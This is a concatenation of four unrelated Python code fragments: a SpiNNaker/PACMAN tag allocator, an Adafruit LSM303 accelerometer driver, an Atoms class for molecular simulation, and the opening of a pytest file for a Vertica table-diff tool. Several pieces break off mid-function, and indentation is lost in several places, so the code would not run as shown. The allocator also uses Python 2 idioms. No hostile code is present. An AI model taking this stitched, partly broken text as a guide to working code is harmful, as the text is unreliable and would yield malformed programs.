not in self._ethernet_area_codes[board_address]):
return False
# Check if each of the tags is available
for ip_tag in ip_tags:
if not self._is_ip_tag_available(board_address, ip_tag.tag,
ip_tag.ip_address, ip_tag.port,
ip_tag.strip_sdp):
return False
return True
def _is_reverse_ip_tag_available(self, board_address, tag, port):
""" Check if the reverse ip tag is available given the constraints
:param board_address: The board address to use
:type board_address: str or None
:param tag: The tag to be used
:type tag: int or None
:param port: The port that the tag will listen on on the board
:type port: int
:return: True if the tag is available, false otherwise
:rtype: int
"""
if board_address is not None:
# If the board address is not None, and the port is already
# assigned, the tag is not available
if (board_address, port) in self._reverse_ip_tag_listen_port:
return False
# If the port is available, return true if the tag is available
return self._is_tag_available(board_address, tag)
# If the board address is not None but the port is already used
# everywhere that the tag is available, the tag is not available
port_available = False
for b_address in self._boards_with_ip_tags:
if ((b_address, port) not in self._reverse_ip_tag_listen_port and
self._is_tag_available(b_address, tag)):
port_available = True
break
return port_available
def _are_reverse_ip_tags_available(self, chip, board_address,
reverse_ip_tags):
""" Check if this chip can be used given the reverse ip tag constraints
:param chip: The coordinates of the chip to check
:type chip: (int, int)
:param board_address: the board to allocate ip tags on
:type board_address: str or None
:param reverse_ip_tags: The reverse ip tag constraints to be met
:type reverse_ip_tags: iterable of \
:py:class:`pacman.model.constraints.tag_allocator_constraints.tag_allocator_require_reverse_iptag_constraint.TagAllocatorRequireReverseIptagConstraint`
:return: True if the chip can be used, False otherwise
:rtype: bool
"""
# If there are no tags, declare they are available
if reverse_ip_tags is None or len(reverse_ip_tags) == 0:
return True
# If there is a fixed board address and the chip is not on the board
# the tags are not available
if (board_address is not None and not (chip.x, chip.y)
in self._ethernet_area_codes[board_address]):
return False
for ip_tag in reverse_ip_tags:
if not self._is_reverse_ip_tag_available(board_address,
ip_tag.tag, ip_tag.port):
return False
return True
def _allocate_sdram(self, chip, key, resources):
""" Allocates the SDRAM on the given chip
:param chip: The chip to allocate the resources of
:type chip: :py:class:`spinn_machine.chip.Chip`
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int, int)
:param resources: the resources containing the SDRAM required
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
"""
if key not in self._sdram_tracker:
self._sdram_tracker[key] = resources.sdram.get_value()
else:
self._sdram_tracker[key] += resources.sdram.get_value()
def _allocate_core(self, chip, key, processor_id, resources):
""" Allocates a core on the given chip
:param chip: The chip to allocate the resources of
:type chip: :py:class:`spinn_machine.chip.Chip`
:param key: The (x, y) coordinates of the chip
:type key: tuple of (int, int)
:param processor_id: The id of the processor to allocate
:type processor_id: int
:param resources: the resources containing the SDRAM required
:type resources:\
:py:class:`pacman.model.resources.resource_container.ResourceContainer`
"""
if key not in self._core_tracker:
self._core_tracker[key] = set()
for processor in chip.processors:
if not processor.is_monitor:
self._core_tracker[key].add(processor.processor_id)
if processor_id is not None:
self._core_tracker[key].remove(processor_id)
else:
# TODO: Find a core that meets the resource requirements
processor_id = self._core_tracker[key].pop()
if len(self._core_tracker[key]) == 0:
self._chips_available.remove(key)
return processor_id
def _allocate_tag(self, board_address, tag):
""" Allocate a tag given the constraints
:param board_address: the board address to allocate to
:type board_address: str or None
:param tag: the tag id to allocate on this board address
:type tag: int or None
:return: a tuple of (board_address and tag)
:rtype: (str, int)
"""
if board_address is None and tag is not None:
for b_address in self._boards_with_ip_tags:
if (b_address not in self._tags_by_board or
tag in self._tags_by_board[b_address]):
board_address = b_address
break
elif board_address is None and tag is None:
board_address = iter(self._boards_with_ip_tags).next()
| |
# gh_stars: 0
# SPDX-FileCopyrightText: 2019 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_lsm303_accel`
====================================================
CircuitPython driver for the accelerometer in LSM303 sensors.
* Author(s): <NAME>, <NAME>
Implementation Notes
--------------------
**Hardware:**
* Adafruit `Triple-axis Accelerometer+Magnetometer (Compass) Board - LSM303
<https://www.adafruit.com/product/1120>`_ (Product ID: 1120)
* Adafruit `FLORA Accelerometer/Compass Sensor - LSM303 - v1.0
<https://www.adafruit.com/product/1247>`_ (Product ID: 1247)
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://circuitpython.org/downloads
* Adafruit's Bus Device library:
https://github.com/adafruit/Adafruit_CircuitPython_BusDevice
"""
import struct
from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import UnaryStruct
from adafruit_register.i2c_bit import RWBit, ROBit
from adafruit_register.i2c_bits import RWBits
from adafruit_register.i2c_struct_array import StructArray
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_LSM303_Accel.git"
# 7-bit I2C addresses (the datasheet's 8-bit write addresses shifted right).
_ADDRESS_ACCEL = const(0x19)  # (0x32 >> 1)       // 0011001x
_ADDRESS_MAG = const(0x1E)  # (0x3C >> 1)       // 0011110x
_ID = const(0xD4)  # (0b11010100)
# Accelerometer registers
_REG_ACCEL_WHO_AM_I = const(0x0F)
_REG_ACCEL_CTRL_REG1_A = const(0x20)
_REG_ACCEL_CTRL_REG2_A = const(0x21)
_REG_ACCEL_CTRL_REG3_A = const(0x22)
_REG_ACCEL_CTRL_REG4_A = const(0x23)
_REG_ACCEL_CTRL_REG5_A = const(0x24)
_REG_ACCEL_CTRL_REG6_A = const(0x25)
_REG_ACCEL_REFERENCE_A = const(0x26)
_REG_ACCEL_STATUS_REG_A = const(0x27)
# Output registers: low/high byte pairs for X, Y, Z.
_REG_ACCEL_OUT_X_L_A = const(0x28)
_REG_ACCEL_OUT_X_H_A = const(0x29)
_REG_ACCEL_OUT_Y_L_A = const(0x2A)
_REG_ACCEL_OUT_Y_H_A = const(0x2B)
_REG_ACCEL_OUT_Z_L_A = const(0x2C)
_REG_ACCEL_OUT_Z_H_A = const(0x2D)
_REG_ACCEL_FIFO_CTRL_REG_A = const(0x2E)
_REG_ACCEL_FIFO_SRC_REG_A = const(0x2F)
_REG_ACCEL_INT1_CFG_A = const(0x30)
_REG_ACCEL_INT1_SOURCE_A = const(0x31)
_REG_ACCEL_INT1_THS_A = const(0x32)
_REG_ACCEL_INT1_DURATION_A = const(0x33)
_REG_ACCEL_INT2_CFG_A = const(0x34)
_REG_ACCEL_INT2_SOURCE_A = const(0x35)
_REG_ACCEL_INT2_THS_A = const(0x36)
_REG_ACCEL_INT2_DURATION_A = const(0x37)
_REG_ACCEL_CLICK_CFG_A = const(0x38)
_REG_ACCEL_CLICK_SRC_A = const(0x39)
_REG_ACCEL_CLICK_THS_A = const(0x3A)
_REG_ACCEL_TIME_LIMIT_A = const(0x3B)
_REG_ACCEL_TIME_LATENCY_A = const(0x3C)
_REG_ACCEL_TIME_WINDOW_A = const(0x3D)
_REG_ACCEL_ACT_THS_A = const(0x3E)
_REG_ACCEL_ACT_DUR_A = const(0x3F)
# note:: Tap related registers are called ``CLICK_`` in the datasheet
# Conversion constants
# NOTE(review): _LSM303ACCEL_MG_LSB is not referenced anywhere in this
# module ("magic!" legacy value) — confirm before removing.
_LSM303ACCEL_MG_LSB = 16704.0  # magic!
_GRAVITY_STANDARD = 9.80665  # Earth's gravity in m/s^2
_SMOLLER_GRAVITY = 0.00980665  # _GRAVITY_STANDARD / 1000, i.e. m/s^2 per mg
# pylint: disable=too-few-public-methods
class Rate:
    """Options for `data_rate`"""

    # Raw values are written to the 4-bit data-rate field of CTRL_REG1_A
    # (see ``_data_rate``); 0 shuts measurement down.
    RATE_SHUTDOWN = const(0)
    RATE_1_HZ = const(1)
    RATE_10_HZ = const(2)
    RATE_25_HZ = const(3)
    RATE_50_HZ = const(4)
    RATE_100_HZ = const(5)
    RATE_200_HZ = const(6)
    RATE_400_HZ = const(7)
    RATE_1620_HZ = const(8)
    RATE_1344_HZ = const(9)
class Mode:
    """Options for `mode`"""

    # Bit depths per mode as used by ``_lsb_shift``:
    MODE_NORMAL = const(0)  # 10-bit data
    MODE_HIGH_RESOLUTION = const(1)  # 12-bit data
    MODE_LOW_POWER = const(2)  # 8-bit data
class Range:
    """Options for `range`"""

    # Full-scale acceleration ranges; written to CTRL_REG4_A via ``_range``.
    RANGE_2G = const(0)
    RANGE_4G = const(1)
    RANGE_8G = const(2)
    RANGE_16G = const(3)
# pylint: enable=too-few-public-methods
class LSM303_Accel: # pylint:disable=too-many-instance-attributes
"""Driver for the LSM303's accelerometer.
:param ~busio.I2C i2c: The I2C bus the device is connected to.
**Quickstart: Importing and using the device**
Here is an example of using the :class:`LSM303_Accel` class.
First you will need to import the libraries to use the sensor
.. code-block:: python
import board
import adafruit_lsm303_accel
Once this is done you can define your `board.I2C` object and define your sensor object
.. code-block:: python
i2c = board.I2C() # uses board.SCL and board.SDA
sensor = adafruit_lsm303_accel.LSM303_Accel(i2c)
Now you have access to the :attr:`acceleration` attribute
.. code-block:: python
acc_x, acc_y, acc_z = sensor.acceleration
"""
# Class-level buffer for reading and writing data with the sensor.
# This reduces memory allocations but means the code is not re-entrant or
# thread safe!
_chip_id = UnaryStruct(_REG_ACCEL_WHO_AM_I, "B")
# Interrupt routing and latching configuration bits.
_int2_int1_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 6)
_int2_int2_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 5)
_int1_latching = RWBit(_REG_ACCEL_CTRL_REG5_A, 3)
_int2_latching = RWBit(_REG_ACCEL_CTRL_REG5_A, 1)
_bdu = RWBit(_REG_ACCEL_CTRL_REG4_A, 7)
_int2_activity_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 3)
_int_pin_active_low = RWBit(_REG_ACCEL_CTRL_REG6_A, 1)
_act_threshold = UnaryStruct(_REG_ACCEL_ACT_THS_A, "B")
_act_duration = UnaryStruct(_REG_ACCEL_ACT_DUR_A, "B")
# Measurement configuration: data rate, axis enables, raw output array.
_data_rate = RWBits(4, _REG_ACCEL_CTRL_REG1_A, 4)
_enable_xyz = RWBits(3, _REG_ACCEL_CTRL_REG1_A, 0)
_raw_accel_data = StructArray(_REG_ACCEL_OUT_X_L_A, "<h", 3)
# Power mode and full-scale range bits (cached in __init__ as well).
_low_power = RWBit(_REG_ACCEL_CTRL_REG1_A, 3)
_high_resolution = RWBit(_REG_ACCEL_CTRL_REG4_A, 3)
_range = RWBits(2, _REG_ACCEL_CTRL_REG4_A, 4)
_int1_src = UnaryStruct(_REG_ACCEL_INT1_SOURCE_A, "B")
# Tap ("click") detection registers — see set_tap()/tapped.
_tap_src = UnaryStruct(_REG_ACCEL_CLICK_SRC_A, "B")
_tap_interrupt_enable = RWBit(_REG_ACCEL_CTRL_REG3_A, 7, 1)
_tap_config = UnaryStruct(_REG_ACCEL_CLICK_CFG_A, "B")
_tap_interrupt_active = ROBit(_REG_ACCEL_CLICK_SRC_A, 6, 1)
_tap_threshold = UnaryStruct(_REG_ACCEL_CLICK_THS_A, "B")
_tap_time_limit = UnaryStruct(_REG_ACCEL_TIME_LIMIT_A, "B")
_tap_time_latency = UnaryStruct(_REG_ACCEL_TIME_LATENCY_A, "B")
_tap_time_window = UnaryStruct(_REG_ACCEL_TIME_WINDOW_A, "B")
# Shared 6-byte scratch buffer used by _read_u8/_write_u8/_read_bytes
# (see the re-entrancy warning above).
_BUFFER = bytearray(6)
def __init__(self, i2c):
    """Initialise the accelerometer on the given I2C bus.

    :param ~busio.I2C i2c: The I2C bus the device is connected to.
    """
    # The register descriptors above read/write through ``i2c_device``.
    self._accel_device = I2CDevice(i2c, _ADDRESS_ACCEL)
    self.i2c_device = self._accel_device
    # Each assignment below writes a hardware register through a
    # descriptor, so statement order is the initialisation order.
    self._data_rate = 2  # Rate.RATE_10_HZ
    self._enable_xyz = 0b111  # enable the X, Y and Z axes
    self._int1_latching = True
    self._int2_latching = True
    self._bdu = True  # block-data-update bit of CTRL_REG4_A
    # self._write_register_byte(_REG_CTRL5, 0x80)
    # time.sleep(0.01)  # takes 5ms
    # Software caches mirroring the mode/range registers; both default to
    # 0 (Mode.MODE_NORMAL, Range.RANGE_2G).
    self._cached_mode = 0
    self._cached_range = 0
def set_tap(
    self,
    tap,
    threshold,
    *,
    time_limit=10,
    time_latency=20,
    time_window=255,
    tap_cfg=None
):
    """
    The tap detection parameters.

    :param int tap: 0 to disable tap detection, 1 to detect only single taps, and 2 to detect \
        only double taps.
    :param int threshold: A threshold for the tap detection. The higher the value the less\
        sensitive the detection. This changes based on the accelerometer range. Good values\
        are 5-10 for 16G, 10-20 for 8G, 20-40 for 4G, and 40-80 for 2G.
    :param int time_limit: TIME_LIMIT register value. Defaults to :const:`10`
    :param int time_latency: TIME_LATENCY register value. Defaults to :const:`20`
    :param int time_window: TIME_WINDOW register value. Defaults to :const:`255`
    :param int tap_cfg: CLICK_CFG register value; overrides *tap* when given. Defaults to `None`
    """
    # Validate arguments first; a custom tap_cfg bypasses the tap check.
    if (tap < 0 or tap > 2) and tap_cfg is None:
        raise ValueError(
            "Tap must be 0 (disabled), 1 (single tap), or 2 (double tap)!"
        )
    if threshold > 127 or threshold < 0:
        raise ValueError("Threshold out of range (0-127)")
    if tap == 0 and tap_cfg is None:
        # Disable click interrupt.
        self._tap_interrupt_enable = False
        self._tap_config = 0
        return
    self._tap_interrupt_enable = True
    if tap_cfg is None:
        if tap == 1:
            tap_cfg = 0x15  # Turn on all axes & singletap.
        if tap == 2:
            tap_cfg = 0x2A  # Turn on all axes & doubletap.
    # Or, if a custom tap configuration register value specified, use it.
    self._tap_config = tap_cfg
    # Remaining writes configure threshold and timing registers.
    self._tap_threshold = threshold
    self._tap_time_limit = time_limit
    self._tap_time_latency = time_latency
    self._tap_time_window = time_window
@property
def tapped(self):
    """
    True if a tap was detected recently. Whether its a single tap or double tap is
    determined by the tap param on :meth:`set_tap`. :attr:`tapped` may be True over
    multiple reads even if only a single tap or single double tap occurred.
    """
    # Bit 6 of the CLICK_SRC register flags the tap event.
    return bool(self._tap_src & 0b1000000)
@property
def _raw_acceleration(self):
    # Burst-read all six output registers in one transaction; OR-ing 0x80
    # into the register address requests address auto-increment.
    self._read_bytes(
        self._accel_device, _REG_ACCEL_OUT_X_L_A | 0x80, 6, self._BUFFER
    )
    # Three little-endian signed 16-bit values: X, Y, Z.
    return struct.unpack_from("<hhh", self._BUFFER[0:6])
@property
def acceleration(self):
    """Read the current acceleration.

    Returns a 3-tuple of signed floats (X, Y, Z) in m/s^2.
    """
    raw = self._raw_acceleration
    # Scale each raw axis reading into physical units.
    return tuple(self._scale_data(axis) for axis in raw)
def _scale_data(self, raw_measurement):
    """Convert one raw axis reading to m/s^2 using the current mode/range."""
    lsb_value, bit_shift = self._lsb_shift()
    # Drop the unused low bits, then scale from counts (mg) to m/s^2.
    scaled = (raw_measurement >> bit_shift) * lsb_value
    return scaled * _SMOLLER_GRAVITY
def _lsb_shift(self):  # pylint:disable=too-many-branches
    """Return the ``(lsb, shift)`` pair for the cached mode and range.

    The bit depth of the data (``shift``) depends on the mode, and the
    lsb scale value depends on both the mode and the range.

    :return: tuple of (lsb, shift)
    :raises AttributeError: if the cached mode/range combination matches
        no known configuration
    """
    lsb = -1  # sentinel: stays -1 when mode/range is unrecognised
    # BUGFIX: use equality (==) instead of identity (is) for these int
    # comparisons — ``is`` on integers relies on CPython's small-int
    # caching and raises a SyntaxWarning on Python 3.8+.
    if self._cached_mode == Mode.MODE_HIGH_RESOLUTION:  # 12-bit
        shift = 4
        if self._cached_range == Range.RANGE_2G:
            lsb = 0.98
        elif self._cached_range == Range.RANGE_4G:
            lsb = 1.95
        elif self._cached_range == Range.RANGE_8G:
            lsb = 3.9
        elif self._cached_range == Range.RANGE_16G:
            lsb = 11.72
    elif self._cached_mode == Mode.MODE_NORMAL:  # 10-bit
        shift = 6
        if self._cached_range == Range.RANGE_2G:
            lsb = 3.9
        elif self._cached_range == Range.RANGE_4G:
            lsb = 7.82
        elif self._cached_range == Range.RANGE_8G:
            lsb = 15.63
        elif self._cached_range == Range.RANGE_16G:
            lsb = 46.9
    elif self._cached_mode == Mode.MODE_LOW_POWER:  # 8-bit
        shift = 8
        if self._cached_range == Range.RANGE_2G:
            lsb = 15.63
        elif self._cached_range == Range.RANGE_4G:
            lsb = 31.26
        elif self._cached_range == Range.RANGE_8G:
            lsb = 62.52
        elif self._cached_range == Range.RANGE_16G:
            lsb = 187.58
    if lsb == -1:
        raise AttributeError(
            "'impossible' range or mode detected: range: %d mode: %d"
            % (self._cached_range, self._cached_mode)
        )
    return (lsb, shift)
@property
def data_rate(self):
    """The measurement rate of the sensor; one of the `Rate` values."""
    return self._data_rate


@data_rate.setter
def data_rate(self, value):
    # Valid `Rate` values are the integers 0..9 inclusive.
    if not 0 <= value <= 9:
        raise AttributeError("data_rate must be a `Rate`")
    self._data_rate = value
@property
def range(self):
    """The full-scale measurement range, +-2G up to +-16G; one of the
    `Range` values. Larger ranges trade away accuracy."""
    return self._cached_range


@range.setter
def range(self, value):
    # Valid `Range` values are the integers 0..3 inclusive.
    if not 0 <= value <= 3:
        raise AttributeError("range must be a `Range`")
    self._range = value
    self._cached_range = value
@property
def mode(self):
    """The power mode of the sensor; one of the `Mode` values. Mode and
    range together determine the measurement accuracy."""
    return self._cached_mode


@mode.setter
def mode(self, value):
    # Valid `Mode` values are the integers 0..2 inclusive.
    if not 0 <= value <= 2:
        raise AttributeError("mode must be a `Mode`")
    # Split the two-bit mode into the high-resolution and low-power bits.
    self._high_resolution = value & 0b01
    self._low_power = (value & 0b10) >> 1
    self._cached_mode = value
def _read_u8(self, device, address):
    """Read one byte from *address* on *device* via the shared buffer."""
    with device as i2c:
        self._BUFFER[0] = address & 0xFF
        # Write the 1-byte register address, then read 1 byte back into
        # the same shared buffer (not thread safe — see _BUFFER).
        i2c.write_then_readinto(self._BUFFER, self._BUFFER, out_end=1, in_end=1)
    return self._BUFFER[0]
def _write_u8(self, device, address, val):
    """Write byte *val* to register *address* on *device*."""
    with device as i2c:
        # First buffer byte is the register address, second the value.
        self._BUFFER[0] = address & 0xFF
        self._BUFFER[1] = val & 0xFF
        i2c.write(self._BUFFER, end=2)
@staticmethod
def _read_bytes(device, address, count, buf):
with device as i2c:
| |
classification.
"""
if molecule not in self.molecules:
raise KeyError("molecule not in system")
self.molecules.remove(molecule)
for bond in molecule.bonds:
self.bonds.remove(bond)
for angle in molecule.angles:
self.angles.remove(angle)
for dihedral in molecule.dihedrals:
self.dihedrals.remove(dihedral)
for improper in molecule.impropers:
self.impropers.remove(improper)
for atom in molecule.atoms:
self.atoms.remove(atom)
if pool_top_types:
self.pool_topological_types()
def clear_cell(self):
    """Reset the simulation cell to undefined."""
    self._cell = None
def disp_attrs(self):
    """Print every instance attribute as ``name: value``, one per line."""
    for name, value in self.__dict__.items():
        print(f"{name}: {value}")
def count(self, atom_type):
    """Count atoms of the given type. Not implemented yet."""
    pass  # in the future maybe
def add_atom(self, atom: Atom):
    """
    Append an Atom to this object's atom list, registering its type in
    atom_types if it is not already there.

    Parameters
    ----------
    atom : Atom
        Atom to be added.

    Raises
    ------
    TypeError
        If *atom* is not an Atom instance.
    """
    # Guard clause keeps the success path unindented.
    if not isinstance(atom, Atom):
        raise TypeError("atom must be type Atom, got "
                        "{}".format(type(atom)))
    self.atoms.append(atom)
    if atom.type not in self.atom_types:
        self.atom_types.append(atom.type)
def add_atoms(self, atoms):
    """
    Add every Atom from another Atoms object to this one, registering
    their types in atom_types as needed.

    Parameters
    ----------
    atoms : Atoms
        Atoms object whose atoms are to be added.

    Raises
    ------
    TypeError
        If *atoms* is not an Atoms instance.
    """
    if not isinstance(atoms, Atoms):
        raise TypeError("atoms must be type Atoms, got "
                        "{}".format(type(atoms)))
    # Delegate to add_atom so type bookkeeping stays in one place.
    for atom in atoms.atoms:
        self.add_atom(atom)
def translate(self, vector):
    """Move every atom by the given displacement vector."""
    for member in self.atoms:
        member.translate(vector)
def rotate(self, angle: float, axis: str):
    """
    Rotate every atom about one axis passing through the origin.

    Parameters
    ----------
    angle : float
        Angle (in degrees) of rotation.
    axis : str
        Axis to rotate around: 'x', 'y' or 'z'.
    """
    for member in self.atoms:
        member.rotate(angle, axis)
def geometric_center(self):
    """Return the mean position of all atoms as a numpy array."""
    total = np.array([0.0, 0.0, 0.0])
    for atom in self.atoms:
        total = total + atom.position
    return total / len(self.atoms)
def rotate_around_self(self, angle: float, axis: str):
    """
    Rotate all atoms about one axis through their geometric center.

    Parameters
    ----------
    angle : float
        Angle (in degrees) of rotation.
    axis : str
        Axis to rotate around: 'x', 'y' or 'z'.
    """
    center = self.geometric_center()
    # Shift the system to the origin, rotate there, then shift it back.
    for atom in self.atoms:
        atom.position -= center
    self.rotate(angle, axis)
    for atom in self.atoms:
        atom.position += center
def translate_to_zero(self):
    """Move the system so its geometric center sits at the origin."""
    center = self.geometric_center()
    self.translate(-1 * center)
def translate_to_cell_center(self):
    """Move the system so its geometric center is at the cell center.

    Raises NameError if the cell is not defined (kept for backward
    compatibility with existing callers).
    """
    if self.cell is None:
        raise NameError("cell not defined")
    self.translate_to_zero()
    # The cell center is half the sum of the three cell vectors.
    center = (self.cell[0] + self.cell[1] + self.cell[2]) / 2
    self.translate(center)
def extended(self, nx, ny, nz, topology=False):
    """
    Extend the system by tiling copies of the existing atoms.
    Returns a new object; self is left untouched.

    Parameters
    ----------
    nx, ny, nz : int
        How many times the system shall be extended in x, y and z.
    topology : bool, optional
        If topology is to be extended as well. Standard is False.

    Returns
    -------
    extended : Atoms
        New Atoms object, extended from the original.

    Notes
    -----
    Meant for orthogonal boxes. Be careful when using triclinic systems.
    Does NOT compute topology internally, only extends the existing stuff.
    """
    result = self.copy(topology=topology)
    # Replicate along each cell vector in turn: a moving copy is shifted
    # by one cell length per step and concatenated onto the result.
    for axis, repeats in enumerate((nx, ny, nz)):
        mover = result.copy(topology=topology)
        shift = [0, 0, 0]
        shift[axis] = self.cell[axis][axis]
        for _ in range(repeats - 1):
            mover.translate(shift)
            result = result + mover.copy(topology=topology)
    # Scale the (assumed orthogonal) cell to the new tiled size.
    result.cell = [[nx * self.cell[0][0], 0, 0],
                   [0, ny * self.cell[1][1], 0],
                   [0, 0, nz * self.cell[2][2]]]
    return result
def filled(self, molecule_xyz_path, gap=4.0,
           centralize=False, topology=True, impropers=True,
           centralize_molecule=False, bulk_path=None):
    # honestly, PackMol does a much better job than this method
    """
    Fills the system's cell with a molecule, avoiding superposition.
    Returns new object, does not change self.

    Parameters
    ----------
    molecule_xyz_path : str
        Path to the molecule's xyz file.
    gap : float, optional
        Minimal distance between every atom in the system and every atom
        in the molecule, in angstroms. Standard is 4.0.
    centralize : bool, optional
        If the atoms in the system are to be translated to the cell center
        before filling up. Standard is False.
    topology : bool, optional
        If topology is to be computed for the molecule. If True, the whole
        molecule is removed if any atom in it superposes with the system
        (by less than the given gap). Standard is True.
    impropers : bool, optional
        If improper dihedrals are to be included in the topology.
        Standard is True.
    centralize_molecule : bool, optional
        If the molecule's atoms are to be centralized in its cell before
        filling the system with it. If True, its xyz file should have a
        Lattice. Standard is False.
    bulk_path : str, optional
        If given, is the path where an xyz file will be written with the
        molecule extended (before superposing atoms are removed).

    Returns
    -------
    filled : Atoms
        New Atoms object, with the original atoms plus filling molecules.

    Notes
    -----
    Meant to be used with orthogonal cells.
    """
    if self.cell is None:
        raise NameError("cell not defined")
    if centralize:
        self.translate_to_cell_center()
    from files.xyz import Xyz
    molecule_xyz = Xyz(molecule_xyz_path)
    if molecule_xyz.atoms.cell is None:
        raise NameError("cell in molecule xyz file not defined")
    if centralize_molecule:
        molecule_xyz.atoms.translate_to_cell_center()
    # How many whole molecule cells fit along each cell vector.
    n_molecules_in_x = math.floor(self.cell[0][0] /
                                  molecule_xyz.atoms.cell[0][0])
    n_molecules_in_y = math.floor(self.cell[1][1] /
                                  molecule_xyz.atoms.cell[1][1])
    n_molecules_in_z = math.floor(self.cell[2][2] /
                                  molecule_xyz.atoms.cell[2][2])
    print("Extending molecule {}*{}*{} times...".format(
        n_molecules_in_x, n_molecules_in_y, n_molecules_in_z))
    if topology:
        molecule_xyz.atoms.compute_topology(impropers=impropers)
    # BUGFIX: extended() has no ``impropers`` parameter (it only copies
    # existing topology); passing it here raised TypeError at runtime.
    bulk = molecule_xyz.atoms.extended(n_molecules_in_x, n_molecules_in_y,
                                       n_molecules_in_z, topology=topology)
    print("Molecule extended")
    if bulk_path is not None:
        bulk.write_xyz(bulk_path)
    n_total_bulk = len(bulk)
    gap_squared = gap ** 2
    molecules_to_be_removed = []
    atoms_to_be_removed = []  # lets us skip atoms whose molecule is gone
    print("Checking {}*{} pairs for contact...".format(len(bulk.atoms),
                                                       len(self.atoms)))
    for filling_atom in bulk.atoms:
        if filling_atom in atoms_to_be_removed:
            continue
        for standing_atom in self.atoms:
            distance_squared = np.sum((filling_atom.position -
                                       standing_atom.position) ** 2)
            if distance_squared <= gap_squared:
                # Mark the whole molecule (and all its atoms) for removal.
                if filling_atom.molecule not in molecules_to_be_removed:
                    molecules_to_be_removed.append(filling_atom.molecule)
                    for atom in filling_atom.molecule.atoms:
                        atoms_to_be_removed.append(atom)
                break
    print("All pairs checked")
    for molecule in molecules_to_be_removed:
        bulk.remove_molecule(molecule, pool_top_types=False)
    print("{}/{} atoms removed".format(n_total_bulk - len(bulk),
                                       n_total_bulk))
    filled = self + bulk
    filled.cell = self.cell
    if topology:
        filled.pool_topological_types()
    return filled
def sort_atoms_by_type(self):  # alphabetical
    """Sort the atom list in place by the string form of each atom's type."""
    self.atoms.sort(key=lambda atom: str(atom.type))
def sort_atoms_by_index(self):
    """Sort the atom list in place by each atom's ``index`` attribute."""
    self.atoms.sort(key=lambda atom: atom.index)
def read_xyz(self, filename):
    """
    Reads atom types and atomic positions from given xyz file,
    as well as Lattice parameters, if there are any (one may
    use Ovito for editing an xyz file and giving it a lattice).
    Erases current atoms in the Atoms object.

    Parameters
    ----------
    filename : str
        Path to the xyz file.
    """
    # makes a dummy Xyz object
    from files.xyz import Xyz
    xyz = Xyz(filename)
    xyz.read_xyz()
    if self.atoms:
        print("WARNING: erasing current {} "
              "atoms...".format(len(self.atoms)))
    # BUGFIX: report the number of atoms actually read from the file;
    # this previously printed len(self.atoms), i.e. the OLD atom count
    # (always 0 for a fresh object), not the count just read.
    print("Reading {} atoms from xyz file...".format(len(xyz.atoms.atoms)))
    self.atoms = xyz.atoms.atoms
    if xyz.atoms.cell is not None:
        self._cell = xyz.atoms.cell
def write_xyz(self, filename, with_classification=False):
    """
    Write an xyz file with atom species and positions, plus cell
    parameters (Lattice) when a cell is defined.

    Parameters
    ----------
    filename : str
        Path to the xyz file to be written.
    with_classification : bool, optional
        If atom classification is wanted as a comment after every line.
        Standard is False.
    """
    # Wrap our atom list in a throwaway Xyz object and delegate to it.
    from files.xyz import Xyz
    dummy = Xyz()
    dummy.atoms.atoms = self.atoms
    if self.cell is not None:
        dummy.atoms.cell = self.cell
    dummy.write_xyz(filename, with_classification=with_classification)
def distance_vector(self, n1, n2):
    """
    Return the vector from atom n1 to atom n2 (position2 minus
    position1). Atom numbering starts at 1, not 0.

    Parameters
    ----------
    n1, n2 : int
        Numbers of the first and second atoms, resp.

    Returns
    -------
    dist : numpy.array
        Distance vector from atom n1 to atom n2.
    """
    # Convert 1-based atom numbers to 0-based list indices.
    return self.atoms[n2 - 1].position - self.atoms[n1 - 1].position
def distance_scalar(self, n1, n2):
"""
Gets the scalar distance between two atoms.
(Starts counting atoms at 1, not 0.)
Parameters
----------
n1, n2 : int
Numbers of the two atoms.
Returns
-------
dist : float
Scalar distance between the two atoms.
"""
distance_vector = self.distance_vector(n1, n2)
dist = np.sqrt(np.sum(distance_vector ** 2))
| |
# tests/test_dbdiff.py
import logging
import os
from pathlib import Path
import pandas as pd
import pytest
from click.testing import CliRunner
from dbdiff.main import check_primary_key
from dbdiff.main import create_diff_table
from dbdiff.main import create_joined_table
from dbdiff.main import get_column_diffs
from dbdiff.main import get_diff_columns
from dbdiff.main import get_diff_rows
from dbdiff.main import get_unmatched_rows
from dbdiff.main import get_unmatched_rows_straight
from dbdiff.main import insert_diff_table
from dbdiff.main import select_distinct_rows
from dbdiff.cli import cli
from dbdiff.vertica import get_column_info
from dbdiff.vertica import get_column_info_lookup
from dbdiff.vertica import get_cur
from dbdiff.vertica import get_table_exists
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)

# Column-metadata fixtures shared by the tests below.
# NOTE(review): 'comparable'/'exclude' presumably flag whether a column
# participates in the diff — confirm against dbdiff.main.
VALID_COL = {'comparable': True, 'exclude': False}
# Same declared dtype on both the x and y sides of the comparison.
INT_DTYPES = {d: 'int' for d in {'x_dtype', 'y_dtype'}}
VARCHAR_DTYPES = {d: 'varchar(10)' for d in {'x_dtype', 'y_dtype'}}
DATE_DTYPES = {d: 'date' for d in {'x_dtype', 'y_dtype'}}
# One row per column name after transpose; columns are dtype/flag metadata.
COMPARE_COLS = pd.DataFrame({'data1': {**INT_DTYPES, **VALID_COL},
                             'data2': {**INT_DTYPES, **VALID_COL},
                             'data3': {**DATE_DTYPES, **VALID_COL},
                             'data4': {**VARCHAR_DTYPES, **VALID_COL},}).transpose()
JOIN_COLS = pd.DataFrame({'join1': {**VARCHAR_DTYPES, **VALID_COL},
                          'join2': {**VARCHAR_DTYPES, **VALID_COL}}).transpose()
@pytest.fixture(scope='session')
def cur():
    """Session-scoped Vertica cursor against the local test database.

    Equivalent shell setup:
    vsql -d docker -u dbadmin
    export VERTICA_HOST="localhost"; export VERTICA_PORT="5433"
    export VERTICA_DATABASE="docker"; export VERTICA_USERNAME="dbadmin"
    export VERTICA_PASSWORD=""
    """
    connection_env = {
        'VERTICA_HOST': 'localhost',
        'VERTICA_PORT': '5433',
        'VERTICA_DATABASE': 'VMart',
